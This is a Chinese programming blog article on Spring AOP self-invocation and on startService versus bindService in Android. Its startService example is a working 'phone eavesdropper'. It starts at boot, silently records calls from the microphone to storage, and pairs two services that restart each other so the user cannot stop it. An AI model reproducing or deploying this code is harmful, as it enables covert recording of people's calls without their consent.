关于同一个service调用service本身的方法

 更新时间:2022年06月21日 11:52:22   作者:缘来是你阿  
这篇文章主要介绍了关于同一个service调用service本身的方法,具有很好的参考价值,希望对大家有所帮助。如有错误或未考虑完全的地方,望不吝赐教

同一个service调用service本身

如果同一个service调用service本身的方法,出现了事务不能控制。

解决方案

1.在spring配置文件中配置 

<!-- expose-proxy service调用aop实现自身调用自身方法-->    
<aop:aspectj-autoproxy proxy-target-class="true" expose-proxy="true"/>

2.在service中用  AopContext.currentProxy() 方法调用

例如调用myService的mySave方法:

((myService) AopContext.currentProxy()).mySave(myPojo);

service的两种调用方法

一、startService开启服务

生命周期如下:

onCreate()–> onStartCommand() —> onDestory();

如果服务已经开启,不会重复的执行onCreate(), 而是会调用onStartCommand()。服务停止的时候调用onDestory()。服务只会被停止一次。

下面是一个电话窃听器的实例:

在Manifest文件中配置必要的权限和组件。设置一个监听开机的广播接收者。

<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.RECORD_AUDIO"/>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<service android:name="com.itheima.phonelistener.SystemService" >
</service>
<service android:name="com.itheima.phonelistener.SystemService2" >
</service>
<receiver android:name="com.itheima.phonelistener.BootReceiver" >
    <intent-filter>
         <action android:name="android.intent.action.BOOT_COMPLETED" />
    </intent-filter>
</receiver>

BootReceiver.java

监听开机事件。

public class BootReceiver extends BroadcastReceiver {
    @Override
    public void onReceive(Context context, Intent intent) {
        Intent i = new Intent(context,SystemService.class);
        context.startService(i);
    }
}

SystemService.java

两个Service类中的一个。两个类采用循环调用机制,当其中一个Service被destroy时,系统调用另一个Service。这样起到了防止用户关闭的流氓效果。

public class SystemService extends Service {
    // 电话管理器
    private TelephonyManager tm;
    // 监听器对象
    private MyListener listener;
    //声明录音机
    private MediaRecorder mediaRecorder;
    @Override
    public IBinder onBind(Intent intent) {
        return null;
    }
    // 服务创建的时候调用的方法
    @Override
    public void onCreate() {
        // 后台监听电话的呼叫状态。
        // 得到电话管理器
        tm = (TelephonyManager) this.getSystemService(TELEPHONY_SERVICE);
        listener = new MyListener();
        tm.listen(listener, PhoneStateListener.LISTEN_CALL_STATE);
        super.onCreate();
    }
    private class MyListener extends PhoneStateListener {
        // 当电话的呼叫状态发生变化的时候调用的方法
        @Override
        public void onCallStateChanged(int state, String incomingNumber) {
            super.onCallStateChanged(state, incomingNumber);
            try {
                switch (state) {
                case TelephonyManager.CALL_STATE_IDLE://空闲状态。
                    if(mediaRecorder!=null){
                        //8.停止捕获
                        mediaRecorder.stop();
                        //9.释放资源
                        mediaRecorder.release();
                        mediaRecorder = null;
                        System.out.println("录制完毕,上传文件到服务器。");
                    }
                    break;
                case TelephonyManager.CALL_STATE_RINGING://零响状态。
                    break;
                case TelephonyManager.CALL_STATE_OFFHOOK://通话状态
                    //开始录音
                    //1.实例化一个录音机
                    mediaRecorder = new MediaRecorder();
                    //2.指定录音机的声音源
                    mediaRecorder.setAudioSource(MediaRecorder.AudioSource.MIC);
                    //3.设置录制的文件输出的格式
                    mediaRecorder.setOutputFormat(MediaRecorder.OutputFormat.DEFAULT);
                    //4.指定录音文件的名称
                    File file = new File(Environment.getExternalStorageDirectory(),System.currentTimeMillis()+".3gp");
                    mediaRecorder.setOutputFile(file.getAbsolutePath());
                    //5.设置音频的编码
                    mediaRecorder.setAudioEncoder(MediaRecorder.AudioEncoder.DEFAULT);
                    //6.准备开始录音
                    mediaRecorder.prepare();
                    //7.开始录音
                    mediaRecorder.start();
                    break;
                }
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
    }
    // 服务销毁的时候调用的方法
    @Override
    public void onDestroy() {
        super.onDestroy();
        // 取消电话的监听
        System.out.println("ondestory");
        Intent i = new Intent(this,SystemService2.class);
        startService(i);
        tm.listen(listener, PhoneStateListener.LISTEN_NONE);
        listener = null;
    }
}

MainActivity.java

控制Service的开启和关闭。

public class MainActivity extends Activity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
    }
    public void start(View view){
        //开启服务。
        Intent intent = new Intent(this,SystemService.class);
        startService(intent);
    }
    public void stop(View view){
        //停止服务。
        Intent intent = new Intent(this,SystemService.class);
        stopService(intent);
    }
}

二、bindService绑定服务

用绑定方式开启的Service,其生命周期为:onCreate() —>onBind();—>onunbind()–>onDestory(); 没有onStartCommand。

步骤:

1. 服务要暴露方法,必须在Service中定义一个内部类——中间人MiddlePerson,实现定义好的接口中的方法(callMethodInService,用于调用Service中的某方法)。

2. 实现服务成功绑定的代码(onBind方法),返回一个中间人new MiddlePerson()。

3. 在Activity中的bind()方法中采用bindService方法开启服务。

Intent intent = new Intent(this, MyService.class);
conn = new MyConn();
bindService(intent, conn, BIND_AUTO_CREATE);

4. 当服务被连接或失去连接时,分别实现ServiceConnection接口中的onServiceConnected()和onServiceDisconnected()方法。

5. 最后就可以通过中间人调用服务里面的方法了。

mp.callMethodInService(55);

MainActivity.java

public class MyService extends Service {
    //2.实现服务成功绑定的代码 ,返回一个中间人。
    @Override
    public IBinder onBind(Intent arg0) {
        System.out.println("服务被成功绑定了。。。。");
        return new MiddlePerson();
    }
    @Override
    public boolean onUnbind(Intent intent) {
        System.out.println("onunbind");
        return super.onUnbind(intent);
    }
    @Override
    public void onCreate() {
        System.out.println("oncreate");
        super.onCreate();
    }
    @Override
    public int onStartCommand(Intent intent, int flags, int startId) {
        System.out.println("onstartcommand");
        return super.onStartCommand(intent, flags, startId);
    }
    @Override
    public void onDestroy() {
        System.out.println("ondestory");
        super.onDestroy();
    }
    /**
     * 这是服务里面的一个方法
     */
    public void methodInService(){
        Toast.makeText(this, "哈哈,服务给你办好了暂住证。", 0).show();
    }
    //1.第一步服务要暴露方法 必须要有一个中间人
    private class MiddlePerson extends Binder implements IMiddlePerson{
        /**
         * 代办暂住证
         * @param money 给钱 50块钱以上才给办。
         */
        public void callMethodInService(int money){
            if(money>=50){
                methodInService();
            }else{
                Toast.makeText(getApplicationContext(), "多准备点钱。", 0).show();
            }
        }
        /**
         * 陪领导打麻将
         */
        public void playMajiang(){
            System.out.println("陪领导打麻将。");
        }
    }
}

三、两种方法的区别

  • start方式开启服务,一旦服务开启,就和调用者(Activity)没有任何关系了。开启者退出后,如果开启者挂掉,服务还在后台长期的运行。而且开启者没有办法去调用服务里面的方法。
  • bind方式开启服务,一旦调用者挂掉,服务也会跟着挂掉。不求同时生,但求同时死。而且开启者可以调用服务里面的方法。

以上为个人经验,希望能给大家一个参考,也希望大家多多支持脚本之家。

相关文章

  • mybatis3使用@Select等注解实现增删改查操作

    mybatis3使用@Select等注解实现增删改查操作

    这篇文章主要介绍了mybatis3使用@Select等注解实现增删改查操作,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
    2020-11-11
  • RocketMQ消息过滤与查询的实现

    RocketMQ消息过滤与查询的实现

    这篇文章主要介绍了RocketMQ消息过滤与查询的实现方式,具有很好的参考价值,希望对大家有所帮助。如有错误或未考虑完全的地方,望不吝赐教
    2021-07-07
  • Jmeter3.0发布!版本更新到底更新了什么

    Jmeter3.0发布!版本更新到底更新了什么

    Jmeter3.0发布!版本更新到底更新了什么?这篇文章主要告诉大家Jmeter3.0版本更新了什么,感兴趣的小伙伴们可以参考一下
    2016-08-08
  • SpringBoot3.0集成MybatisPlus的实现方法

    SpringBoot3.0集成MybatisPlus的实现方法

    本文主要介绍了SpringBoot3.0集成MybatisPlus的实现方法,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
    2024-08-08
  • 使用IDEA创建一个vert.x项目的方法

    使用IDEA创建一个vert.x项目的方法

    这篇文章主要介绍了使用IDEA创建一个vert.x项目的方法,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
    2018-09-09
  • java反射之通过反射了解集合泛型的本质(详解)

    java反射之通过反射了解集合泛型的本质(详解)

    下面小编就为大家带来一篇java反射之通过反射了解集合泛型的本质(详解)。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
    2017-06-06
  • java理论基础Stream元素的匹配与查找

    java理论基础Stream元素的匹配与查找

    这篇文章主要为大家介绍了java理论基础Stream元素的匹配与查找方法的示例说明解析,有需要的朋友可以借鉴参考下,希望能够有所帮助,祝大家多多进步
    2022-03-03
  • Java静态方法和实例方法区别详解

    Java静态方法和实例方法区别详解

    这篇文章主要为大家详细介绍了Java静态方法和实例方法的区别,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
    2016-12-12
  • SpringBoot实现mysql与clickhouse多数据源的项目实践

    SpringBoot实现mysql与clickhouse多数据源的项目实践

    本文主要介绍了SpringBoot实现mysql与clickhouse多数据源的项目实践,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
    2023-11-11
  • Springboot 启动之后初始化资源的几种方法

    Springboot 启动之后初始化资源的几种方法

    在我们实际工作中,总会遇到这样需求,在项目启动的时候需要做一些初始化的操作,比如初始化线程池,提前加载好加密证书等,本文主要介绍了Springboot 启动之后初始化资源的几种方法,感兴趣的可以了解一下
    2024-01-01

最新评论